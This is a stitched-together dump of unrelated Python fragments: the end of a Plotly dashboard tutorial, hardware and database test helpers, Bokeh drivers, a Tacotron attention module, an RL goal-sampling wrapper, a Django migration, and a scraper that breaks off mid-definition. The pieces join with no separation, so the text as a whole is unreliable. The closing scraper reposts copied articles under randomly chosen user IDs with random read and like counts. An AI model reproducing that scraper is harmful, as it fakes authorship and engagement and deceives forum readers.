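pie_like = {'type': 'pie', 'domain': {'x': [0.78, 1.0], 'y': [0.0, 0.267]}}   # placed via its own domain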
# In[53]: hooligans['layout']['yaxis'].update({'domain' : [0.67333, 0.95]}) hooligans['data'][1]['domain'].update({'y' : [0.651, 0.95]}) pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-20.png") # # Let's now move the dashboard, table and arrests pie chart titles down, and the other titles up. # # These title annotations were the last seven we added to the dashboard, so they should be at the end of the list of annotations. # # We know that we have to move the first two chart titles down, and the rest of the chart titles up a bit. We also have to move the dashboard title annotation (the last one we added) down: # In[54]: for i, ann in enumerate(hooligans['layout']['annotations'][-7:]): if i in [0, 1]: ann['y'] -= 0.05 elif i == 6: ann['y'] -=0.025 else: ann['y'] += 0.03 pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-21.png") # # Let's now change the hovermode, legend position and tracegroupgap. We're not going to get the legend items to line up perfectly with the charts, but we should be able to spread them out enough to make it clear. # In[55]: hooligans['layout'].update({'hovermode' : 'closest'}) hooligans['layout']['legend'].update({'tracegroupgap' : 160}) pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-22.png") # # Let's send our dashboard to the Plotly cloud: # In[56]: #py.plot(hooligans, filename="Football hooligans in the UK", fileopt = 'overwrite') py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\py.plot-0.png") # # ### What have we learnt this lesson? # In this last lesson ih the course we've brought together everything that we previously learnt to create our most complex dashboard yet. We've included tables, pie charts, bar charts, line charts, chart titles and a dashboard title. # # I really hope you've enjoyed this course. 
# If you have any questions, please ask in the comments section or email import lcd from adc import adc_button,adc_switches import time button = adc_button() switches = adc_switches() def main(): # Main program block lcd.begin() print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) lcd.clear() lcd.waitPage() print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) lcd.clear() lcd.welcomePage('Dao Minh An', 'B1509360', 7) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) lcd.clear() lcd.addExtraInfoPage('Dao Minh An', 'B1509360') lcd.pointerPos(2, 1) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) lcd.clear() lcd.welcomeTempPage(9) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) lcd.clear() lcd.unknownIDPage() lcd.pointerPos(2, 2) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) lcd.clear() lcd.addFingerPage(1) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) lcd.clear() lcd.addFingerSuccessPage() print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) lcd.clear() lcd.addFingerFailPage() lcd.pointerPos(2, 1) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) lcd.clear() lcd.addRFIDPage() print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) lcd.clear() lcd.addRFIDSuccessPage() print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) lcd.clear() lcd.addRFIDFailPage() lcd.pointerPos(2, 1) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) lcd.clear() lcd.addInfoPage() print(switches.read()) 
time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) lcd.clear() lcd.mainDatabasePage() lcd.pointerPos(3, 2) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) lcd.pointerPos(3, 3) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) lcd.clear() lcd.exportSuccessPage() print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(button.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) print(switches.read()) time.sleep(0.5) lcd.clear() lcd.exportFailPage() lcd.pointerPos(2, 1) time.sleep(3) lcd.clear() lcd.importPage() lcd.pointerPos(2, 1) time.sleep(3) lcd.clear() lcd.importSuccessPage() time.sleep(3) lcd.clear() lcd.importFailPage() lcd.pointerPos(2, 1) time.sleep(3) lcd.clear() lcd.mainLockerPage() lcd.pointerPos(3, 1) time.sleep(3) lcd.clear() lcd.infoLockerPage('', 'B1509360') time.sleep(3) lcd.clear() lcd.infoLockerTempPage() time.sleep(3) if __name__ == '__main__': try: main() except KeyboardInterrupt: pass ''' Utilities for test. ''' import os import pyodbc from logging import getLogger, basicConfig, DEBUG basicConfig(level='DEBUG') logger = getLogger() # Database Connections PG = 'pg' MSSQL = 'mssql' # Database Drivers drivers = {} drivers[PG] = '{PostgreSQL Unicode}' drivers[MSSQL] = '{ODBC Driver 17 for SQL Server}' def get_conn_str(db): ''' Get database connection string for the provided driver. ''' conn_str = ';'.join([ 'DRIVER={driver}', 'SERVER={server}', 'PORT={port}', 'DATABASE={database}', 'UID={username}', 'PWD={password}' ]) driver = drivers[db] if db == PG: return conn_str.format( driver=driver, server=os.environ['TEST_PG_DB_HOST'], database=os.environ['TEST_PG_DB_NAME'], username=os.environ['TEST_PG_DB_USER'], password=os.environ['TEST_PG_DB_PASSWORD'], port=5432 ) elif db == MSSQL: return conn_str.format( driver=driver, server=os.environ['TEST_MSSQL_DB_HOST'], database=os.environ['TEST_MSSQL_DB_NAME'], username=os.environ['TEST_MSSQL_DB_USER'], password=os.environ['TEST_MSSQL_DB_PASSWORD'], port=1433 ) else: raise RuntimeError('Unsupported database connection: {}'.format(db)) def connect(driver): ''' Connect to the database server. ''' connection_str = get_conn_str(driver) logger.debug('Connecting to Database Server [driver={}].'.format(driver)) return pyodbc.connect(connection_str) def exec_query(db, sql): ''' Execute a test SQL query on the given database. 
''' connection = connect(db) logger.debug('Connection estabilished with database - {}.'.format(db)) logger.debug('Creating a new cursor.') cursor = connection.cursor() logger.debug('Executing SQL query.') result = cursor.execute(sql).fetchval() logger.debug('Received result set.') return result 1-10 import os from os import path from xml.etree import ElementTree RESOURCES_DIR = path.join(os.path.dirname(os.path.abspath(__file__)), 'resources') def get_resource_path(*parts): return path.join(RESOURCES_DIR, *parts) def assert_xml_equal(source1, source2): assert xml_compare( ElementTree.parse(source1).getroot(), ElementTree.parse(source2).getroot(), lambda s: print('Comparison error was: {}'.format(s)) ) ### #https://bitbucket.org/ianb/formencode/src/tip/formencode/doctest_xml_compare.py?fileviewer=file-view-default#cl-70 ### def xml_compare(x1, x2, reporter=None): if x1.tag != x2.tag: if reporter: reporter('Tags do not match: %s and %s' % (x1.tag, x2.tag)) return False for name, value in x1.attrib.items(): if x2.attrib.get(name) != value: if reporter: reporter('Attributes do not match: %s=%r, %s=%r' % (name, value, name, x2.attrib.get(name))) return False for name in x2.attrib.keys(): if name not in x1.attrib: if reporter: reporter('x2 has an attribute x1 is missing: %s' % name) return False if not text_compare(x1.text, x2.text): if reporter: reporter('text: %r != %r' % (x1.text, x2.text)) return False if not text_compare(x1.tail, x2.tail): if reporter: reporter('tail: %r != %r' % (x1.tail, x2.tail)) return False cl1 = x1.getchildren() cl2 = x2.getchildren() if len(cl1) != len(cl2): if reporter: reporter('children length differs, %i != %i' % (len(cl1), len(cl2))) return False i = 0 for c1, c2 in zip(cl1, cl2): i += 1 if not xml_compare(c1, c2, reporter=reporter): if reporter: reporter('children %i do not match: %s' % (i, c1.tag)) return False return True def text_compare(t1, t2): if not t1 and not t2: return True if t1 == '*' or t2 == '*': return True return (t1 or '').strip() == (t2 or '').strip() src/vm-django/release.py """ Functions used to handle mystery clue release. """ from django.utils import timezone from datetime import datetime, timedelta from django.conf import settings def get_current_release(): """ Returns the current release number, otherwise returns zero if START_DATETIME not yet reached. Note: - START_DATETIME, RELEASE_INTERVAL and MARK_INTERVAL are set in the main settings file - times are in the timezone TIME_ZONE, set in the main settings file - returned release number is a decimal (ie. 
1.5) if current datetime is within the mark_interval Test: - before start date (pass) - at start date (pass) - after start date but before start date + interval (pass) - at start date + interval (pass) - after start date + interval (pass) :return: int """ release_interval = timedelta(days=int(settings.RELEASE_INTERVAL)) mark_interval = timedelta(days=int(settings.MARK_INTERVAL)) start = timezone.make_aware(datetime.strptime(settings.START_DATETIME, settings.DATETIME_FORMAT), timezone.get_default_timezone()) current = timezone.localtime(timezone.now(), timezone.get_default_timezone()) release = 0 mark = 0 date_time = start while date_time <= current: release += 1 date_time += release_interval if date_time <= current: mark += 1 date_time += mark_interval if release != mark: return release return release + 0.5 settings/filepath.py theory_PATH = "../data/theory"#!/usr/bin/env python import unittest import test.all_tests testSuite = test.all_tests.create_test_suite() text_runner = unittest.TextTestRunner().run(testSuite) ''' import unittest import os import sys print("[tests.py]") scriptDir = os.path.dirname(os.path.realpath(__file__)) if len(scriptDir) < 1: print("ERROR: couldn't get os.path.dirname of script file \"%s\"" % __file__) testDir = scriptDir # same since we're in test assert(os.path.isfile(os.path.join(testDir, "tests.py"))) repoDir = os.path.dirname(testDir) infrDir = os.path.join(repoDir, 'infrastructure') testInfrDir = os.path.join(testDir, 'infrastructure') print("repoDir: %s" % repoDir) print("infrDir: %s" % infrDir) print("testInfrDir: %s" % testInfrDir) assert(os.path.isdir(infrDir)) badInfrFile = os.path.join(infrDir, "shader_loader_test.py") testInfrFile = os.path.join(testInfrDir, "shader_loader_test.py") assert(not os.path.isfile(badInfrFile)) assert(os.path.isfile(testInfrFile)) sys.path.insert(0, repoDir) sys.path.insert(0, testDir) # ^ testDir is top priority since contains a test version of # infrastructure. print("[tests.py] Test path: \"%s\"" % testDir) loader = unittest.TestLoader() suite = loader.discover(testDir, pattern='*test.py') # sys.path.insert(0, repoDir) runner = unittest.TextTestRunner(verbosity=2) result = runner.run(suite) problems = len(result.errors) + len(result.failures) print("\nProblems: %s\n" % problems) exit(problems) ''' afonit/bokeh #----------------------------------------------------------------------------- # Copyright (c) 2012 - 2017, Anaconda, Inc. All rights reserved. # # Powered by the Bokeh Development Team. # # The full license is in the file LICENSE.txt, distributed with this software. #----------------------------------------------------------------------------- ''' Provide a set of decorators useful for repeatedly updating a a function parameter in a specified way each time the function is called. These decorators can be especially useful in conjunction with periodic callbacks in a Bokeh server application. Example: As an example, consider the ``bounce`` forcing function, which advances a sequence forwards and backwards: .. code-block:: python from bokeh.driving import bounce @bounce([0, 1, 2]) def update(i): print(i) If this function is repeatedly called, it will print the following sequence on standard out: .. code-block:: none 0 1 2 2 1 0 0 1 2 2 1 ... 
''' #----------------------------------------------------------------------------- # Boilerplate #----------------------------------------------------------------------------- from __future__ import absolute_import, division, print_function, unicode_literals import logging log = logging.getLogger(__name__) from bokeh.util.api import general, dev ; general, dev #----------------------------------------------------------------------------- # Imports #----------------------------------------------------------------------------- # Standard library imports from functools import partial # External imports # Bokeh imports #----------------------------------------------------------------------------- # Globals and constants #----------------------------------------------------------------------------- __all__ = ( 'bounce', 'cosine', 'count', 'force', 'linear', 'repeat', 'sine', ) #----------------------------------------------------------------------------- # General API #----------------------------------------------------------------------------- @general((1,0,0)) def bounce(sequence): ''' Return a driver function that can advance a "bounced" sequence of values. .. code-block:: none seq = [0, 1, 2, 3] # bounce(seq) => [0, 1, 2, 3, 3, 2, 1, 0, 0, 1, 2, ...] Args: sequence (seq) : a sequence of values for the driver to bounce ''' N = len(sequence) def f(i): div, mod = divmod(i, N) if div % 2 == 0: return sequence[mod] else: return sequence[N-mod-1] return partial(force, sequence=_advance(f)) @general((1,0,0)) def cosine(w, A=1, phi=0, offset=0): ''' Return a driver function that can advance a sequence of cosine values. .. code-block:: none value = A * cos(w*i + phi) + offset Args: w (float) : a frequency for the cosine driver A (float) : an amplitude for the cosine driver phi (float) : a phase offset to start the cosine driver with offset (float) : a global offset to add to the driver values ''' from math import cos def f(i): return A * cos(w*i + phi) + offset return partial(force, sequence=_advance(f)) @general((1,0,0)) def count(): ''' Return a driver function that can advance a simple count. ''' return partial(force, sequence=_advance(lambda x: x)) @general((1,0,0)) def force(f, sequence): ''' Return a decorator that can "force" a function with an arbitrary supplied generator Args: sequence (iterable) : generator to drive f with Returns: decorator ''' def wrapper(): f(next(sequence)) return wrapper @general((1,0,0)) def linear(m=1, b=0): ''' Return a driver function that can advance a sequence of linear values. .. code-block:: none value = m * i + b Args: m (float) : a slope for the linear driver x (float) : an offset for the linear driver ''' def f(i): return m * i + b return partial(force, sequence=_advance(f)) @general((1,0,0)) def repeat(sequence): ''' Return a driver function that can advance a repeated of values. .. code-block:: none seq = [0, 1, 2, 3] # repeat(seq) => [0, 1, 2, 3, 0, 1, 2, 3, 0, 1, ...] Args: sequence (seq) : a sequence of values for the driver to bounce ''' N = len(sequence) def f(i): return sequence[i%N] return partial(force, sequence=_advance(f)) @general((1,0,0)) def sine(w, A=1, phi=0, offset=0): ''' Return a driver function that can advance a sequence of sine values. .. 
code-block:: none value = A * sin(w*i + phi) + offset Args: w (float) : a frequency for the sine driver A (float) : an amplitude for the sine driver phi (float) : a phase offset to start the sine driver with offset (float) : a global offset to add to the driver values ''' from math import sin def f(i): return A * sin(w*i + phi) + offset return partial(force, sequence=_advance(f)) #----------------------------------------------------------------------------- # Dev API #----------------------------------------------------------------------------- #----------------------------------------------------------------------------- # Private API #----------------------------------------------------------------------------- def _advance(f): ''' Yield a sequence generated by calling a given function with successively incremented integer values. Args: f (callable) : The function to advance Yields: f(i) where i increases each call ''' i = 0 while True: yield f(i) i += 1 #----------------------------------------------------------------------------- # Code #----------------------------------------------------------------------------- robertchase/rhc import pytest from rhc.database.db import DB @pytest.fixture(scope='session') def db_session(): DB.setup(user='test', db='test_rhc', host='mysql', delta=True, commit=False) yield DB DB.close() @pytest.fixture def db(db_session): DB.start_transaction() yield DB DB.stop_transaction() import datetime import string import pytest import random from rdflib import Graph from datamodel import Datamodel @pytest.fixture def datamodel(): config = { "ngsi2": "datamodel/NGSI2", "ngsi-ld": "datamodel/NGSI-LD", "classes": "datamodel/classes" } return Datamodel(config) def test_get_dir_list(datamodel): assert len(datamodel.device_types) > 0 assert len(datamodel.iotdevice_types) > 0 assert len(datamodel.get_classes_files()) > 0 def test_ngsi_ld_read_values(datamodel): for file in datamodel.device_types: variables = datamodel.get_variables(file) assert len(variables) > 0 def test_ngsi_ld_create_entity(datamodel): for file in datamodel.device_types: props = {} properties = datamodel.get_properties_dict(file) for key, value in properties.items(): (order, name, property, optional, data_type, val) = value if data_type == 'datetime': props[property] = datetime.datetime.now() else: props[property] = ''.join([random.choice(string.ascii_letters + string.digits) for n in range(32)]) entity = datamodel.create_entity(file, props) Graph().parse(data=entity, format='json-ld') def test_ngsi_ld_create_classes(datamodel): classes = datamodel.get_classes_files() for file in classes: entity = open(file, 'rt').read() Graph().parse(data=entity, format='json-ld') def test_create_iotdevice_from_json(datamodel): for file in datamodel.iotdevice_types: datamodel.create_iotdevice_from_json(file) # TODO: JSON validation conf/script/src/build_system/build_target/compiler_instance_targets.py __all__ = ['CompilerInstanceTargets'] from dataclasses import dataclass from .build_target_cls import * from ..compiler import * @dataclass(order=True, frozen=True) class CompilerInstanceTargets: compiler_instance: CompilerInstance build_targets: list[BuildTarget] def __iter__(self): return self.build_targets.__iter__() """ This file is copied from https://github.com/thuhcsi/tacotron/blob/master/model/attention.py """ import torch from torch import nn def get_mask_from_lengths(memory, memory_lengths): """Get mask tensor from list of length Args: memory: (batch, max_time, dim) memory_lengths: array like """ mask = 
memory.data.new(memory.size(0), memory.size(1)).zero_().bool() for idx, l in enumerate(memory_lengths): mask[idx][:l] = 1 return ~mask class BahdanauAttention(nn.Module): """ BahdanauAttention This attention is described in: , , and , "Neural Machine Translation by Jointly Learning to Align and Translate," in International Conference on Learning Representation (ICLR), 2015. https://arxiv.org/abs/1409.0473 """ def __init__(self, query_dim, attn_dim, score_mask_value=1e-8): super(BahdanauAttention, self).__init__() # Query layer to project query to hidden representation # (query_dim -> attn_dim) self.query_layer = nn.Linear(query_dim, attn_dim, bias=False) # For computing alignment energies self.tanh = nn.Tanh() self.v = nn.Linear(attn_dim, 1, bias=False) # For computing weights self.score_mask_value = score_mask_value def forward(self, query, processed_memory, mask=None): """ Get normalized attention weight Args: query: (batch, 1, dim) or (batch, dim) processed_memory: (batch, max_time, dim) mask: (batch, max_time) Returns: alignment: [batch, max_time] """ if query.dim() == 2: # insert time-axis for broadcasting query = query.unsqueeze(1) # Alignment energies alignment = self.get_energies(query, processed_memory) if mask is not None: mask = mask.view(query.size(0), -1) alignment.data.masked_fill_(mask, self.score_mask_value) # Alignment probabilities (attention weights) alignment = self.get_probabilities(alignment) # (batch, max_time) return alignment def init_attention(self, processed_memory): # Nothing to do in the base module return def get_energies(self, query, processed_memory): """ Compute the alignment energies """ # Query (batch, 1, dim) processed_query = self.query_layer(query) # Alignment energies (batch, max_time, 1) alignment = self.v(self.tanh(processed_query + processed_memory)) # (batch, max_time) return alignment.squeeze(-1) def get_probabilities(self, energies): """ Compute the alignment probabilites (attention weights) from energies """ return nn.Softmax(dim=1)(energies) class LocationSensitiveAttention(BahdanauAttention): """ LocationSensitiveAttention (LSA) This attention is described in: , , , , and , "Attention-based Models for Speech Recognition," in Advances in Neural Information Processing Systems, 2015, pp. 577-585. 
https://arxiv.org/abs/1506.07503 """ def __init__(self, query_dim, attn_dim, filters=32, kernel_size=31, score_mask_value=-float("inf")): super(LocationSensitiveAttention, self).__init__(query_dim, attn_dim, score_mask_value) # Location layer: Conv1d followd by Linear self.conv = nn.Conv1d(2, filters, padding=(kernel_size - 1) // 2, kernel_size=kernel_size, bias=False,stride=1,dilation=1) self.L = nn.Linear(filters, attn_dim, bias=False) # Cumulative attentions self.attention_weights = None self.cumulative = None def init_attention(self, processed_memory): # Initialize cumulative attention b, t, c = processed_memory.size() self.cumulative = processed_memory.data.new(b, t).zero_() self.attention_weights = processed_memory.data.new(b, t).zero_() def get_energies(self, query, processed_memory): # Query (batch, 1, dim) processed_query = self.query_layer(query) # Location feature location = torch.cat((self.attention_weights.unsqueeze(1),self.cumulative.unsqueeze(1)),dim=1) processed_loc = self.L(self.conv(location).transpose(1, 2)) # Alignment energies (batch, max_time, 1) alignment = self.v(self.tanh(processed_query + processed_memory + processed_loc)) # (batch, max_time) return alignment.squeeze(-1) def get_probabilities(self, energies): # Current attention self.attention_weights = nn.Softmax(dim=1)(energies) # Cumulative attention self.cumulative = self.cumulative + self.attention_weights # (batch, max_time) return self.attention_weights class AttentionWrapper(nn.Module): def __init__(self, rnn_cell, attention_mechanism): super(AttentionWrapper, self).__init__() self.rnn_cell = rnn_cell self.attention_mechanism = attention_mechanism def forward(self, query, attention, cell_state, memory, processed_memory=None, mask=None, memory_lengths=None): if processed_memory is None: processed_memory = memory if memory_lengths is not None and mask is None: mask = get_mask_from_lengths(memory, memory_lengths) # Concat input query and previous attention context cell_input = torch.cat((query, attention), -1) # Feed it to RNN cell_output = self.rnn_cell(cell_input, cell_state) # GRUCell or LSTMCell if type(self.rnn_cell) is nn.LSTMCell: query = cell_output[0] else: query = cell_output # Normalized attention weight # (batch, max_time) alignment = self.attention_mechanism(query, processed_memory, mask) # Attention context vector # (batch, 1, dim) attention = torch.bmm(alignment.unsqueeze(1), memory) # (batch, dim) attention = attention.squeeze(1) return cell_output, attention, alignment from options.train_options import TrainOptions from Training.train import train opt = TrainOptions().parse() opt.name = 'prostateHD' ## change #1 # opt.name = 'colon_Fine_100' # opt.dataroot = './Datasets/ColonPair_Fine/' opt.dataroot = './Datasets/ProstatePair/' ## change #2 opt.label_nc = 4 ## change #3 opt.contour = False ## change #4 Gs = [] Ss = [] NoiseAmp = [] NoiseAmpS = [] # opt.reals = [[64, 64], [128, 128], [192, 192], [256, 256], [320, 320], [384, 384], [448, 448], [512, 512]] opt.reals = [[64,64],[128,128],[192,192]] opt.erod = [1, 3, 6, 13] opt.alpha = 0.1 opt.scale_factor = 1.30 opt.noise_amp = 1 opt.stop_scale = len(opt.reals) opt.phase = "train" train(opt, Gs, Ss, NoiseAmp, NoiseAmpS, opt.reals) import logging import numpy as np from stable_baselines3.common.vec_env import VecEnvWrapper from stable_baselines3.common.vec_env.base_vec_env import ( VecEnvObs, VecEnvStepReturn, VecEnv, ) class VecHardGoalSampleWrapper(VecEnvWrapper): def __init__(self, venv: VecEnv, alpha: float = 0.65): 
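        # (added commentary, inferred from the code below, not part of the original)
        # This wrapper keeps an exponential moving average (weight ``alpha``) of episode
        # returns for every candidate goal cell. Whenever an episode finishes it pushes
        # fresh sampling probabilities to the wrapped envs via
        # env_method("update_goal_probs", probs): until every goal has been sampled at
        # least once the probability mass is spread only over unvisited goals, and
        # afterwards goals with a lower average return (i.e. harder goals) receive
        # proportionally more probability.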
super(VecHardGoalSampleWrapper, self).__init__(venv) self.episode_returns = None self.episode_lengths = None self.goal_locations = venv.get_attr("locations", 0)[0] maze = venv.get_attr("maze", 0)[0] self.avg_rewards = np.zeros(maze.shape) self.goal_sampled = np.zeros(maze.shape) self.avg_rewards[self.goal_locations[:, 0], self.goal_locations[:, 1]] = np.inf # self.goal_sampled[self.goal_locations[:, 0], self.goal_locations[:, 1]] = 0 self.alpha = alpha self.all_goals_sampled = False def reset(self) -> VecEnvObs: obs = self.venv.reset() self.episode_returns = np.zeros(self.num_envs, dtype=np.float32) self.episode_lengths = np.zeros(self.num_envs, dtype=np.int32) return obs def step_wait(self) -> VecEnvStepReturn: obs, rewards, dones, infos = self.venv.step_wait() self.episode_returns += rewards self.episode_lengths += 1 new_infos = list(infos[:]) for i in range(len(dones)): if dones[i]: episode_return = self.episode_returns[i] episode_length = self.episode_lengths[i] goal = self.venv.get_attr("goal", i)[0] if self.avg_rewards[goal[1], goal[0]] != np.inf: self.avg_rewards[goal[1], goal[0]] = ( self.alpha * self.avg_rewards[goal[1], goal[0]] + (1 - self.alpha) * episode_return ) else: self.avg_rewards[goal[1], goal[0]] = episode_return if not self.all_goals_sampled: self.goal_sampled[goal[1], goal[0]] = 1 logging.info(np.sum(self.goal_sampled)) if np.sum(self.goal_sampled) == len(self.goal_locations): logging.info("All goals have been sampled at least once.") self.all_goals_sampled = True self.update_probs_from_reward() else: self.update_probs_from_unvisited() else: self.update_probs_from_reward() self.episode_returns[i] = 0 self.episode_lengths[i] = 0 return obs, rewards, dones, new_infos def update_probs_from_unvisited(self): not_visited = np.zeros(self.avg_rewards.shape) not_visited[self.goal_locations[:, 0], self.goal_locations[:, 1]] = 1 not_visited = not_visited - self.goal_sampled prob_positions = not_visited[ self.goal_locations[:, 0], self.goal_locations[:, 1] ] probs = prob_positions / np.sum(prob_positions) self.venv.env_method("update_goal_probs", probs) def update_probs_from_reward(self): rew_per_goal = self.avg_rewards[ self.goal_locations[:, 0], self.goal_locations[:, 1] ] rew_per_goal = rew_per_goal * -1 rew_per_goal = rew_per_goal + np.min(rew_per_goal) * -1 + 0.01 probs = rew_per_goal / np.sum(rew_per_goal) self.venv.env_method("update_goal_probs", probs) def close(self) -> None: if self.results_writer: self.results_writer.close() return self.venv.close() gennadis/dvmn_teams # Generated by Django 4.0.1 on 2022-01-27 10:57 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ("teams", "0006_team_time_slot"), ] operations = [ migrations.AddField( model_name="student", name="team", field=models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name="Students", to="teams.team", verbose_name="Student team", ), ), migrations.AddField( model_name="student", name="time_slot", field=models.ManyToManyField( blank=True, related_name="Students", to="teams.TimeSlot", verbose_name="Student time slot", ), ), migrations.AlterField( model_name="team", name="pm", field=models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name="Teams", to="teams.pm", verbose_name="Team PM", ), ), migrations.AlterField( model_name="team", name="time_slot", field=models.ForeignKey( blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, 
related_name="Teams", to="teams.timeslot", verbose_name="Team time slot", ), ), ] #! /usr/bin/env python import os import shutil import sys import unittest import base from dynamo_consistency import main from dynamo_consistency import picker from dynamo_consistency import history from dynamo_consistency import config class TestNoOrphanMain(unittest.TestCase): def setUp(self): config.CONFIG = None config.LOCATION = 'consistency_config.json' main.opts.NOORPHAN = False for dirname in ['www', 'var']: if os.path.exists(dirname): shutil.rmtree(dirname) main.registry.deleted = [] def run_main(self): main.main(picker.pick_site()) self.assertEqual(history.missing_files(main.config.SITE), ['/store/data/runB/0003/missing.root']) self.assertFalse(history.orphan_files(main.config.SITE)) self.assertEqual(history.empty_directories(main.config.SITE), ['/store/data/runC/0000/emtpy/dir', '/store/data/runC/0000/emtpy', '/store/data/runC/0000', '/store/data/runC']) self.assertEqual(sorted(main.registry.deleted, reverse=True), history.empty_directories(main.config.SITE)) def test_flag(self): main.opts.NOORPHAN = True self.run_main() def test_config(self): config.LOCATION = 'txtfiles/no_orphan_config.json' self.run_main() if __name__ == '__main__': unittest.main(argv=base.ARGS) # -*- coding: utf-8 -*- import os import random from datetime import datetime from urlparse import urlparse from uuid import uuid4 import requests import sys from bs4 import BeautifulSoup from qiniu import put_file, Auth from app.dao.thread_dao import ThreadDao, ForumThreadRelationDao, ForumDao from app.models import Thread, ForumThreadRelation reload(sys) sys.setdefaultencoding( "utf-8" ) bucket_name='cniao5-imgs' base_dir="//Users/Ivan.Wong/tempdata" base_img_url="http://7mno4h.com1.z0.glb.clouddn.com/" baseurl ="http://www.jianshu.com/" article_base_url =baseurl+"/p/"; listurl = baseurl +str("collections/284/notes?order_by=added_at&page=") user_ids=[10277,10278,10279,10280,10281,10282,10283,10284,10285,10286,10287,10288,10289,10290,10291,10292,10293,10294,10295,10296,10297,10298, 10299,10300,10301,10302,10303,10304,10305,10306,10307,10308,10309,10310,10311, 10312,10313,10314,10315,10316,10317,10318,10319,10320,10321,10322,10323,10324,10325,10326,10327,10328] q = Auth('', '') class HtmlSpider(): def save_article_to_db(self,title,content,brief,img_links,user_id=None,forum_id=None): img_links = ",".join(img_links) if user_id==None: try: user_id = user_ids[random.randint(0, 52)] except: user_id=user_ids[0] try: read_count = random.randint(200, 10000) like_count = random.randint(20, 1000) thread = Thread( title=title, content=content, imgs=img_links, user_id=user_id, created_time=datetime.now(), read_count=read_count, is_original=0, brief=brief, status =1, like_count=like_count, thread_type=1 ) thread_dao = ThreadDao() thread_dao.save(thread) print 'forum_id='+str(forum_id) if forum_id is not None and forum_id>0: relation= ForumThreadRelation(forum_id=forum_id,thread_id=thread.id, created_time=datetime.now()) ForumThreadRelationDao().save(relation) forum_dao = ForumDao() forum = forum_dao.get(forum_id) #数量加1 forum.thread_count+=1 forum_dao.save(forum) except: pass def download_img(self,url_str,filename=None): try: if filename==None: filename==self.get_filename(url_str) self.mkdirs(base_dir) r = requests.get(url_str,timeout=10) chunk_size=100 with open(base_dir+filename, 'wb') as fd: for chunk in r.iter_content(chunk_size): fd.write(chunk) self.upload_file_to_qiniu(base_dir+filename,filename) except: pass def 
